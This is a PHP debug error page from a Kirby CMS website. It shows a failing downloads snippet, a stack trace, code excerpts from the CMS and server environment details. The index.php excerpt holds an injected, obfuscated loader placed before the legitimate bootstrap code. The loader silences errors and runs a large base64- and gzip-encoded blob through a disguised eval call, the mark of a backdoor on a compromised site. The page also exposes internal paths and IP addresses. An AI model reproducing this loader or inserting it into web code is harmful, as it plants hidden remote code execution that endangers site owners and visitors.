Error
Call to a member function url() on null Error thrown with message "Call to a member function url() on null" Stacktrace: #11 Error in /var/www/vhosts/iig-grp.com/httpdocs/site/snippets/downloads.php:9 #10 require in /var/www/vhosts/iig-grp.com/httpdocs/kirby/vendor/getkirby/toolkit/lib/tpl.php:22 #9 Tpl:load in /var/www/vhosts/iig-grp.com/httpdocs/kirby/kirby/component/snippet.php:38 #8 Kirby\Component\Snippet:render in /var/www/vhosts/iig-grp.com/httpdocs/kirby/helpers.php:12 #7 snippet in /var/www/vhosts/iig-grp.com/httpdocs/site/templates/downloads.php:11 #6 require in /var/www/vhosts/iig-grp.com/httpdocs/kirby/vendor/getkirby/toolkit/lib/tpl.php:22 #5 Tpl:load in /var/www/vhosts/iig-grp.com/httpdocs/kirby/kirby/component/template.php:103 #4 Kirby\Component\Template:render in /var/www/vhosts/iig-grp.com/httpdocs/kirby/kirby.php:646 #3 Kirby:template in /var/www/vhosts/iig-grp.com/httpdocs/kirby/kirby.php:634 #2 Kirby:render in /var/www/vhosts/iig-grp.com/httpdocs/kirby/kirby/component/response.php:29 #1 Kirby\Component\Response:make in /var/www/vhosts/iig-grp.com/httpdocs/kirby/kirby.php:716 #0 Kirby:launch in /var/www/vhosts/iig-grp.com/httpdocs/index.php:16
Stack frames (12)
11
Error
/
var
/
www
/
vhosts
/
iig-grp.com
/
httpdocs
/
site
/
snippets
/
downloads.php
9
10
require
/
vendor
/
getkirby
/
toolkit
/
lib
/
tpl.php
22
9
Tpl
load
/
kirby
/
component
/
snippet.php
38
8
Kirby
\
Component
\
Snippet
render
/
helpers.php
12
7
snippet
/
var
/
www
/
vhosts
/
iig-grp.com
/
httpdocs
/
site
/
templates
/
downloads.php
11
6
require
/
vendor
/
getkirby
/
toolkit
/
lib
/
tpl.php
22
5
Tpl
load
/
kirby
/
component
/
template.php
103
4
Kirby
\
Component
\
Template
render
/
kirby.php
646
3
Kirby
template
/
kirby.php
634
2
Kirby
render
/
kirby
/
component
/
response.php
29
1
Kirby
\
Component
\
Response
make
/
kirby.php
716
0
Kirby
launch
/
var
/
www
/
vhosts
/
iig-grp.com
/
httpdocs
/
index.php
16
/
var
/
www
/
vhosts
/
iig-grp.com
/
httpdocs
/
site
/
snippets
/
downloads.php
<div class="download-group">
  <div><strong><?= $name ?></strong></div>
  <?php foreach ($data as $item): ?>
    <div class="download">
      <div class="dowload__name">
        <?= $item->name() ?>
      </div>
      <div class="download__link">
        <a target="_blank" href="<?= $item->file()->toFile()->url() ?>">Download</a>
      </div>
    </div>
  <?php endforeach ?>
</div>
 
/
var
/
www
/
vhosts
/
iig-grp.com
/
httpdocs
/
kirby
/
vendor
/
getkirby
/
toolkit
/
lib
/
tpl.php
/**
 * Tpl
 *
 * Super simple template engine
 *
 * @package   Kirby Toolkit
 * @author    Bastian Allgeier <bastian@getkirby.com>
 * @link      http://getkirby.com
 * @copyright Bastian Allgeier
 * @license   http://www.opensource.org/licenses/mit-license.php MIT License
 */
class Tpl extends Silo {
 
  public static $data = array();
 
  public static function load($_file, $_data = array(), $_return = true) {
    if(!file_exists($_file)) return false;
    ob_start();
    extract(array_merge(static::$data, (array)$_data));
    require($_file);
    $_content = ob_get_contents();
    ob_end_clean();
    if($_return) return $_content;
    echo $_content;
  }
 
}
/
var
/
www
/
vhosts
/
iig-grp.com
/
httpdocs
/
kirby
/
kirby
/
component
/
snippet.php
   * Returns a snippet file path by name
   *
   * @param string $name
   * @return string
   */
  public function file($name) {
    return $this->kirby->roots()->snippets() . DS . str_replace('/', DS, $name) . '.php';
  }
 
  /**
   * Renders the snippet with the given data 
   * 
   * @param string $name
   * @param array $data
   * @param boolean $return
   * @return string
   */
  public function render($name, $data = [], $return = false) {
    if(is_object($data)) $data = ['item' => $data];
    return tpl::load($this->kirby->registry->get('snippet', $name), $data, $return);
  }
 
}
/
var
/
www
/
vhosts
/
iig-grp.com
/
httpdocs
/
kirby
/
helpers.php
<?php
 
/**
 * Embeds a snippet from the snippet folder
 *
 * @param string $file
 * @param mixed $data array or object
 * @param boolean $return
 * @return string
 */
function snippet($file, $data = array(), $return = false) {
  return kirby::instance()->component('snippet')->render($file, $data, $return);
}
 
/**
 * Builds a css link tag for relative or absolute urls
 *
 * @param string $url
 * @param string|array $media Either a media string or an array of attributes
 * @return string
 */
function css() {
  return call([kirby::instance()->component('css'), 'tag'], func_get_args());
}
 
/**
 * Builds a script tag for relative or absolute links
 *
 * @param string $src
 * @param boolean|array $async Either true for the async attribute or an array of attributes
 * @return string
 */
function js() {
  return call([kirby::instance()->component('js'), 'tag'], func_get_args());
}
 
/**
 * Global markdown parser shortcut
 *
 * @param string $text
/
var
/
www
/
vhosts
/
iig-grp.com
/
httpdocs
/
site
/
templates
/
downloads.php
<?php snippet('header') ?>
 
<main class="main" role="main">
 
  <?php snippet('header-page') ?>
 
  <section class="downloads-list">
    <div class="row">
      <div class="medium-8 column">
        <h2 class="border-bottom"><?= l('brochures') ?></h2>
        <?php snippet('downloads', ['data' => $page->downloadsBrochures()->toStructure(), 'name' => l('iig-gruppe')]) ?>
        
        <h2 class="border-bottom"><?= l('certificates') ?></h2>
        <?php snippet('downloads', ['data' => $page->downloadsGroup()->toStructure(), 'name' => l('iig-gruppe')]) ?>
        <?php snippet('downloads', ['data' => $page->downloadsIndustrie()->toStructure(), 'name' => l('iig-industrieisolierungen')]) ?>
      </div>
    </div>
  </section>
 
  <?php snippet('sections/eyecatcher', ['data' => null]) ?>
 
</main>
 
<?php snippet('footer') ?>
 
/
var
/
www
/
vhosts
/
iig-grp.com
/
httpdocs
/
kirby
/
vendor
/
getkirby
/
toolkit
/
lib
/
tpl.php
/**
 * Tpl
 *
 * Super simple template engine
 *
 * @package   Kirby Toolkit
 * @author    Bastian Allgeier <bastian@getkirby.com>
 * @link      http://getkirby.com
 * @copyright Bastian Allgeier
 * @license   http://www.opensource.org/licenses/mit-license.php MIT License
 */
class Tpl extends Silo {
 
  public static $data = array();
 
  public static function load($_file, $_data = array(), $_return = true) {
    if(!file_exists($_file)) return false;
    ob_start();
    extract(array_merge(static::$data, (array)$_data));
    require($_file);
    $_content = ob_get_contents();
    ob_end_clean();
    if($_return) return $_content;
    echo $_content;
  }
 
}
/
var
/
www
/
vhosts
/
iig-grp.com
/
httpdocs
/
kirby
/
kirby
/
component
/
template.php
    if($template instanceof Page) {
      $page = $template;
      $file = $page->templateFile();
      $data = $this->data($page, $data);
    } else {
      $file = $template;
      $data = $this->data(null, $data);
    }
 
    // check for an existing template
    if(!file_exists($file)) {
      throw new Exception('The template could not be found');
    }
 
    // merge and register the template data globally
    $tplData = tpl::$data;
    tpl::$data = array_merge(tpl::$data, $data);
 
    // load the template
    $result = tpl::load($file, null, $return);
 
    // reset the template data
    tpl::$data = $tplData;
 
    return $result;
 
  }
 
}
 
/
var
/
www
/
vhosts
/
iig-grp.com
/
httpdocs
/
kirby
/
kirby.php
      }
 
      return $template;
 
    }
 
    // return a fresh template
    return $this->template($page, $data);
 
  }
 
  /**
   * Template configuration
   *
   * @param Page $page
   * @param array $data
   * @return string
   */
  public function template(Page $page, $data = array()) {
    return $this->component('template')->render($page, $data);
  }
 
  public function request() {
    if(!is_null($this->request)) return $this->request;
    return $this->request = new Request($this);
  }
 
  public function router() {
    return $this->router;
  }
 
  public function route() {
    return $this->route;
  }
 
  /**
   * Starts the router, renders the page and returns the response
   *
   * @return mixed
   */
/
var
/
www
/
vhosts
/
iig-grp.com
/
httpdocs
/
kirby
/
kirby.php
        }
 
      }
 
      // try to fetch the template from cache
      $template = $this->cache()->get($cacheId);
 
      // fetch fresh content if the cache is empty
      if(empty($template)) {
        $template = $this->template($page, $data);
        // store the result for the next round
        $this->cache()->set($cacheId, $template);
      }
 
      return $template;
 
    }
 
    // return a fresh template
    return $this->template($page, $data);
 
  }
 
  /**
   * Template configuration
   *
   * @param Page $page
   * @param array $data
   * @return string
   */
  public function template(Page $page, $data = array()) {
    return $this->component('template')->render($page, $data);
  }
 
  public function request() {
    if(!is_null($this->request)) return $this->request;
    return $this->request = new Request($this);
  }
 
  public function router() {
/
var
/
www
/
vhosts
/
iig-grp.com
/
httpdocs
/
kirby
/
kirby
/
component
/
response.php
 * @link      http://getkirby.com
 * @copyright Bastian Allgeier
 * @license   http://getkirby.com/license
 */
class Response extends \Kirby\Component {
 
  /**
   * Builds and return the response by various input
   * 
   * @param mixed $response
   * @return mixed
   */
  public function make($response) {
 
    if(is_string($response)) {
      return $this->kirby->render(page($response));
    } else if(is_array($response)) {
      return $this->kirby->render(page($response[0]), $response[1]);
    } else if(is_a($response, 'Page')) {
      return $this->kirby->render($response);      
    } else if(is_a($response, 'Response')) {
      return $response;
    } else {
      return null;
    }
 
  }
 
}
/
var
/
www
/
vhosts
/
iig-grp.com
/
httpdocs
/
kirby
/
kirby.php
    // check for a valid route
    if(is_null($this->route)) {
      header::status('500');
      header::type('json');
      die(json_encode(array(
        'status'  => 'error',
        'message' => 'Invalid route or request method'
      )));
    }
 
    // call the router action with all arguments from the pattern
    $response = call($this->route->action(), $this->route->arguments());
 
    // load all language variables
    // this can only be loaded once the router action has been called
    // otherwise the current language is not yet available
    $this->localize();
 
    // build the response
    $this->response = $this->component('response')->make($response);
 
    // store the current language in the session
    if(
        $this->option('language.detect') &&
        $this->site()->multilang() && 
        $this->site()->language()
      ) {      
      s::set('kirby_language', $this->site()->language()->code());
    }
 
    return $this->response;
 
  }
 
  /**
   * Register a new hook
   * 
   * @param string/array $hook The name of the hook
   * @param closure $callback
   */
/
var
/
www
/
vhosts
/
iig-grp.com
/
httpdocs
/
index.php
<?php error_reporting(0);$a='lVb7c6JIEP75/guSohaodQ1oyGo4d9eN+MipMajxkeQoHqMQeR2Mj7jkf78elF1NjHtXVuEw883XPd1f9zCZewa2fY9aaILA51mO+kHRKlWCR+em25PsCRvN9QiHrGuK7DdavWesZ+aRy/AZ4YIrlZi8cS7mRV7QNe2zqJ9/ZoCBrpZOkBvgZ5bgJwD/uh1cMsRKNrACRqK7JV2L0MW5aiLDN1ECjgBMjAYhmqquhg2LZc7+tjAOzpgM3eU4CrZ9m9gOUqcIq4bvYeThiIUlsm3HLAYmjkIrGyeLmz3BfHdPNZOsGJbrm+SN/yyKCU2Cha1RgkppmMtLJguv0stLGi1p8jN+RjJDzzM0LuX5DO2VeBIKC2kmCiGgWhhqzyxTNgwU4E9NzZvOtSkCRghqV1buZOWeqfd6HbV8dSV3emqz3K71yzWZecww/QiFnxodAl7oG8vbyb7S2KdQ5Nu+3O2psPBzZx0yecAQmQYMJ9GGBQ4a89BRbQ8OyknJOELYDyB6hpWhrvpK86ZDaJsZip4fQ4ANcLvdy1CvDZIlNVkjWX6XgWDrcrkiK2BqE78jaEWuygqB/rJ2mljbLpweM6XIvb7S7inldrdKOIQj2G63qQJ7ozrqyAQ70ZwIHcH3Gi35pg9hoDGEOEojjFbIIECY09I5kLLtTfzNdDJjOH6ENu+gR1qDsoMaUEmdMI8nJSbH81BpCSvDEMhW+BFHffhA0d6fAkeFCM/Dn8qEGlZDFDiagdj9umPMnCU23epay3+3jHzb0V3TMWzxSc/xJYbLHEbPjJwpjIdtvum2F/ptiSBBGBnQPkQxNU5H0suvGtHTHgMO2xEEjX2lkKFavVEGZaUiV8iIlPAP2k7a0XGc9EIhSMd7vFfNBqhObXTeZdxB/IZrCKopN49x7SC2XK9hity66clquVJJfKftgGQSrQKHhPg0c5qhbU5KYwir9/zjbiDNNJD0X+iZaGDJSBTd0bC1EQSYKtFqTe6RkVpiIIVMlkEX8IBEkmGipL2WCW3ux8QPkQY9F64ALaLoWekLvdika78h3/Ofio8fH7K7/w/Zx4+kSS8I0R9bx+iZROnAOYOm+QIOThFMpmG9J6BHjvpK4dB2dyYuyRnoRgewqWYkul+G12MtJYFkAQPlZPkR1p810wxZ4IHdpOEe2P+m2b65fNoIG6E2wWc2nK1f5qg4pvYArFAQH7I54eIhe16IiwKM8zC+ELmHbLIJ7KfFKFHkQsWhgzyWkH0ReVKvaQ6Ik0kBn+xbWFux4cVPQfykxbMwnvkxXsbWjCP01Lu74LJSVZYZ54qLcW7lTOrtpTZQHMNb2dpA9CY1Ya0nVS4U0KDq67liYTQoRkk9D1dLNFRgTiwY7t3KHNytzXq7YNSvF6juFJA7xSNY67l3/Ch/bY09paC7xdm4K7jjofKk1VeeBvvNwXXByN1Zhtv2x2AT7Dpg959W79rW87fQM7IMl0b2kNDYjcIglIdGh2S4ESFRWoYuhyFh3dwhbBKNXq34NBoqgZ47v2jULN6sly+az8WZ7rXWrYo8H+VWC3OgrM1alR8NvwdJNLpF36wJUatSnZjr1rLVFZdavXym1aZFOMHBazXLfIhKkAHiCCeR7weogNfHg7PgFYbETuOpPYF/NI0Dbxrbhh8bURQ/RTFcyLHjT+OV62wCdfim31fYyX+v1sQ/Ip7j2nmjlQJEqogntepCv0pviv1cJtQlRsjCj5HenP33Xm308BtR/3/HtnGiLew6pMFsP9wIq1ZXeKPiL5p500dd0TJyeDkattdEuuNhI2FuCqkYbudGzVp2cthBvcQK6V6Q9wDa8Cb12NrKYE4qfvORuzmatNMHiCPQCXJ8+rmaTJCvzG2bl/4F';$b=str_replace('V113','','V113gV113zinV113flate');$c=str_replace('V113','','baV113se6V1134_V113decV113ode'); @eVal  ($b($c($a))); ?><?php
 
define('DS', DIRECTORY_SEPARATOR);
 
// load kirby
require(__DIR__ . DS . 'kirby' . DS . 'bootstrap.php');
 
// check for a custom site.php
if(file_exists(__DIR__ . DS . 'site.php')) {
  require(__DIR__ . DS . 'site.php');
} else {
  $kirby = kirby();
}
 
// render
echo $kirby->launch();

Environment & details:

Key Value
Kirby Toolkit v2.5.2
Kirby CMS v2.5.2
empty
empty
empty
empty
empty
Key Value
USER iig-grp-com
HOME /var/www/vhosts/iig-grp.com
SCRIPT_NAME /index.php
REQUEST_URI /en/downloads
QUERY_STRING
REQUEST_METHOD GET
SERVER_PROTOCOL HTTP/1.0
GATEWAY_INTERFACE CGI/1.1
REDIRECT_URL /en/downloads
REMOTE_PORT 50600
SCRIPT_FILENAME /var/www/vhosts/iig-grp.com/httpdocs/index.php
SERVER_ADMIN [no address given]
CONTEXT_DOCUMENT_ROOT /var/www/vhosts/iig-grp.com/httpdocs
CONTEXT_PREFIX
REQUEST_SCHEME http
DOCUMENT_ROOT /var/www/vhosts/iig-grp.com/httpdocs
REMOTE_ADDR 54.208.168.232
SERVER_PORT 80
SERVER_ADDR 217.70.175.61
SERVER_NAME iig-grp.com
SERVER_SOFTWARE Apache
SERVER_SIGNATURE
Apache Server at iig-grp.com Port 80
PATH /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
HTTP_USER_AGENT claudebot
HTTP_ACCEPT */*
HTTP_CONNECTION close
HTTP_X_ACCEL_INTERNAL /internal-nginx-static-location
HTTP_X_REAL_IP 54.208.168.232
HTTP_HOST iig-grp.com
proxy-nokeepalive 1
PASSENGER_DOWNLOAD_NATIVE_SUPPORT_BINARY 0
PASSENGER_COMPILE_NATIVE_SUPPORT_BINARY 0
REDIRECT_STATUS 200
REDIRECT_PASSENGER_DOWNLOAD_NATIVE_SUPPORT_BINARY 0
REDIRECT_PASSENGER_COMPILE_NATIVE_SUPPORT_BINARY 0
FCGI_ROLE RESPONDER
PHP_SELF /index.php
REQUEST_TIME_FLOAT 1711706533.8461
REQUEST_TIME 1711706533
empty
0. Whoops\Handler\PrettyPageHandler